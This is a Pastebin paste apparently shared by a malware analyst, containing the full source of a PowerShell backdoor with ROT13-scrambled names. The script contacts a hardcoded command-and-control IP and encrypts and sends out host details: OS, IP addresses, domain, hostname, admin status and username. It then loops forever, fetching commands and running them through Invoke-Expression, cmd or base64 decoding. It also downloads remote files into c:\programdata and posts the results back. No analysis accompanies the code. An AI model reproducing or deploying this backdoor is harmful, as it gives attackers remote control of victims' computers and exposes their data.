dissectmalware

Malicious PowerShell

Mar 3rd, 2019
1,018
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $global:url = ""
  2. $global:id = ""
  3. $cevingr = 959,713
  4. $choyvp = 37,437
  5. $C = @('http://162.223.89.53')
  6.  
  7. function Zbq ($x,$H,$n) {
  8.   $Xi = $x
  9.   $Ei = $H
  10.   $Yi = 1
  11.   while ($Ei -gt 0) {
  12.     if (($Ei % 2) -eq 0)
  13.     {
  14.       $Xi = ($Xi * $Xi) % $n
  15.       $Ei = $Ei / 2
  16.     } else
  17.     {
  18.       $Yi = ($Xi * $Yi) % $n
  19.       $Ei = $Ei - 1
  20.     }
  21.   }
  22.   return $Yi
  23. }
  24.  
  25. function raPelcg ($pk,$cynvagrkg) {
  26.   try {
  27.     $xrl,$n = $pk;
  28.     $zlneenl = @();
  29.     for ($i = 0; $i -lt $cynvagrkg.Length; $i++)
  30.     {
  31.       $ahz = [int][char]$cynvagrkg[$i]
  32.       $t = Zbq $ahz $xrl $n
  33.       $zlneenl += $t
  34.     }
  35.     return $zlneenl
  36.   }
  37.   catch
  38.   {
  39.     trgEnaqbzCebkl
  40.   }
  41. }
  42.  
  43. function qrPelcg ($pk,$pvcuregrkg) {
  44.   try {
  45.     $xrl,$n = $pk;
  46.     $zl_neenl = @();
  47.     for ($i = 0; $i -lt $pvcuregrkg.Length; $i++) {
  48.       $ahz = [int]$pvcuregrkg[$i]
  49.       $t = Zbq $ahz $xrl $n
  50.       $zl_neenl += [convert]::ToChar([int]$t)
  51.     }
  52.     return -join $zl_neenl
  53.   }
  54.   catch { trgEnaqbzCebkl }
  55. }
  56.  
  57. function uggcCBFG ($hey,$rap_zft) {
  58.   trgEnaqbzCebkl
  59.   try {
  60.     $pbagrag = $rap_zft
  61.     $jroerd = [System.Net.WebRequest]::Create($global:url + $hey);
  62.     $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()
  63.     $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
  64.     $rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag);
  65.     $jroerd.Method = "POST";
  66.     $jroerd.ContentLength = $rapbqr_qngn.Length;
  67.     $jroerd.ContentType = "application/json"
  68.     if ($rapbqr_qngn.Length -gt 0)
  69.     { $erd_fgernz = $jroerd.GetRequestStream();
  70.       $erd_fgernz.Write($rapbqr_qngn,0,$rapbqr_qngn.Length); }
  71.     [System.Net.WebResponse]$erfc = $jroerd.GetResponse();
  72.     if ($erfc -ne $null) { $qngn = $erfc.GetResponseStream(); [System.IO.StreamReader]$erf_qngn = New-Object System.IO.StreamReader $qngn; [string]$erfhyg = $erf_qngn.ReadToEnd(); } }
  73.   catch {
  74.     $erfhyg = "error"
  75.     Write-Host $hey "`t" ($global:url + $_.Exception.Message)
  76.     trgEnaqbzCebkl
  77.     Start-Sleep (Get-Random -Minimum 20 -Maximum 40) }
  78.   return $erfhyg }
  79.  
  80. function uggcTRG ($hey) {
  81.   trgEnaqbzCebkltry { $jroerd = [System.Net.WebRequest]::Create($global:url + $hey);
  82.     $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()
  83.     $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
  84.     $jroerd.Method = "GET"; [System.Net.WebResponse]
  85.     $erfc = $jroerd.GetResponse();
  86.     if ($erfc -ne $null) { $qngn = $erfc.GetResponseStream(); [System.IO.StreamReader]$erf_qngn = New-Object System.IO.StreamReader $qngn; [string]$erfhyg = $erf_qngn.ReadToEnd(); } } catch { $erfhyg = "error"
  87.     Write-Host $hey "`t" ($global:url + $_.Exception.Message)
  88.     trgEnaqbzCebkl
  89.     Start-Sleep (Get-Random -Minimum 20 -Maximum 40) } return $erfhyg }
  90.  
  91. function fuggcTRG ($hey) {
  92.   try { $jroerd = [System.Net.WebRequest]::Create($hey);
  93.     $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()
  94.     $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
  95.     $jroerd.Method = "GET";
  96.     [System.Net.WebResponse]$erfc = $jroerd.GetResponse();
  97.     if ($erfc -ne $null) { $qngn = $erfc.GetResponseStream();
  98.       [System.IO.StreamReader]$erf_qngn = New-Object System.IO.StreamReader $qngn;
  99.       [string]$erfhyg = $erf_qngn.ReadToEnd(); } } catch {
  100.     $erfhyg = "" }
  101.   return $erfhyg
  102. }
  103.  
  104. function Riny ($pzq) {
  105.   try {
  106.     $bhg = Invoke-Expression $pzq -ErrorAction SilentlyContinue
  107.     if ($pzq.StartsWith("cd"))
  108.     {
  109.       $bhg = $PWD;
  110.     }
  111.     $bhg = ($bhg | Out-String)
  112.   } catch
  113.   { $bhg = $_.Exception.Message }
  114.   return $bhg
  115. }
  116.  
  117. function vasbvavg () {
  118.   function trgVC () { try { $vcf = ""
  119.       Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | Where-Object { $_.IPAddress[0] -notlike '169*' } | ForEach-Object { $vcf = $vcf + "-" + $_.IPAddress[0] }
  120.       return $vcf.substring(1); }
  121.     catch { return "ErrorIP"; } }
  122.   function trgBF () { try { return (Get-WmiObject Win32_OperatingSystem).Name; } catch { return "ErrorOS"; } }
  123.   function trgNepu () { try { return (Get-WmiObject Win32_OperatingSystem).OSArchitecture; } catch { return "ErrorArch"; } }
  124.   function trgQbznva () { try { return (Get-WmiObject Win32_ComputerSystem).Domain; } catch { return "ErrorDomain"; } }
  125.   function trgUbfgAnzr () { try { return (Get-WmiObject Win32_ComputerSystem).Name; } catch { return "ErrorHostName"; } }
  126.   function trgHfreanzr () { try { try {
  127.         $sfb = New-Object -ComObject Scripting.FileSystemObject;
  128.         $hfre = $env:UserName
  129.         $ghfre = $hfre.Replace('[^a-zA-Z0-9]','')
  130.         if ($ghfr -eq $hfre) {
  131.           return $hfre
  132.         }
  133.         return ($sfb.getfolder('c:\\users\\' + $env:UserName).ShortName)
  134.       } catch {
  135.         return $env:UserName
  136.       }
  137.     } catch
  138.     { return "-" }
  139.   }
  140.   function vfNqzva () { try {
  141.       $JvaqbjfVqragvgl = [System.Security.Principal.WindowsIdentity]::GetCurrent()
  142.       $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal ($JvaqbjfVqragvgl)
  143.       $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator
  144.       if ($Cevapvcny.IsInRole($NqzvaEbyr))
  145.       { return '+' }
  146.       else { return '' } }
  147.     catch { return "" } }
  148.   function trgCVC () { try {
  149.       $ernyVC = fuggcTRG "http://ipv4bot.whatismyipaddress.com/"
  150.       return $ernyVC
  151.     } catch {
  152.       return "ErrorPublicIP" } }
  153.   $FlfVasb = trgBF
  154.   $FlfVasb += "**"
  155.   $FlfVasb += trgVC
  156.   $FlfVasb += "**"
  157.   $FlfVasb += trgNepu
  158.   $FlfVasb += "**"
  159.   $FlfVasb += trgUbfgAnzr
  160.   $FlfVasb += "**"
  161.   $FlfVasb += trgQbznva
  162.   $FlfVasb += "**"
  163.   $FlfVasb += vfNqzva
  164.   $FlfVasb += trgHfreanzr
  165.   $FlfVasb += "**"
  166.   $FlfVasb += trgCVC
  167.   $global:id = zq5trarengbe ($FlfVasb)
  168.   return ($global:id + '**' + $FlfVasb) }
  169.  
  170. function zq5trarengbe ($fgeVa)
  171. { $zq5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
  172.   $hgs8 = New-Object -TypeName System.Text.UTF8Encoding
  173.   $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa)))
  174.   $bhgchg = $unfu.Replace('-','')
  175.   return $bhgchg }
  176.  
  177. function pbzznaq_naq_pbageby ($pzq) { try {
  178.     if ($pzq.StartsWith('upload')) { try {
  179.         $pzq = $pzq.Replace('upload ','')
  180.         $wc = New-Object System.Net.WebClient
  181.         $wc.proxy = [Net.WebRequest]::GetSystemWebProxy()
  182.         $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
  183.         $wc.DownloadFile($pzq,("c:\programdata\" + $pzq.substring($pzq.LastIndexOf('/'),$pzq.Length - $pzq.LastIndexOf('/'))))
  184.         return Riny "pwd" } catch {
  185.         return $_.Exception.Message } }
  186.     elseif ($pzq.StartsWith('cmd')) {
  187.       $pzq = $pzq.Replace('cmd ','')
  188.       try { $bhg = cmd /c $pzq
  189.         $bhg = $bhg | Out-String
  190.         return $bhg } catch {
  191.         return $_.Exception.Message } }
  192.     elseif ($pzq.StartsWith('b64')) { $pzq = $pzq.Replace('b64 ','')
  193.       try {
  194.         $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq))
  195.         $bhg = Riny $pzq
  196.         $bhg = $bhg | Out-String
  197.         return $bhg } catch {
  198.         return $_.Exception.Message } } else { return Riny $pzq } } catch { return $_.Exception.Message } }
  199.  
  200. function trgEnaqbzCebkl () {
  201. $eaq = Get-Random -Minimum 0 -Maximum ($C.Length)
  202. $global:url = $C[$eaq]
  203. }
  204.  
  205. function ertChfu ([string]$p,[string]$k,[string]$v) { try { New-ItemProperty -Path $p -Name $k -Value $v -Force -ErrorAction SilentlyContinue | Out-Null } catch { return "error" } }
  206.  
  207. function ertvfgre () { while ($true) { Write-Host "R-I"
  208.     $vasb = vasbvavg
  209.     $vasb = raPelcg $cevingr $vasb
  210.     $vasb = ('{"data":"' + $vasb + '"}')
  211.     $vasb = uggcCBFG ("/oa/")
  212.     $vasb
  213.     if ($vasb -eq '"done"') { break } else { Start-Sleep 30 } Write-Host "R-O" } }
  214.    
  215.    
  216. ertvfgre
  217. while ($true) {
  218.   Write-Host "W-I"
  219.   try { $pzq = uggcTRG ("/oc/api/?t=" + $global:id)
  220.     if ($pzq.Length -gt 0) {
  221.       $pzq = $pzq.substring(1,$pzq.Length - 2)
  222.       $pzq = $pzq -split "~~!!~~"
  223.       $pvq = $pzq[0]
  224.       $pzq = $pzq[1]
  225.       $erfhyg = pbzznaq_naq_pbageby $pzq
  226.       if ($erfhyg.Length -le 1)
  227.       {
  228.         $erfhyg = "NULL"
  229.       }
  230.       $erfhyg = [Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($erfhyg))
  231.       $erfhyg = ($pvq + ':' + $erfhyg)
  232.       $nqqe = ('/or/?t=' + $global:id)
  233.       $qngn = ('{"data":"' + $erfhyg + '"}')
  234.       $erfhyg = uggcCBFG $nqqe $qngn
  235.     }
  236.   }
  237.   catch {
  238.   trgEnaqbzCebkl
  239.   continue
  240.   }
  241.   Write-Host "W-O" Start-Sleep 300 }
Add Comment
Please, Sign In to add comment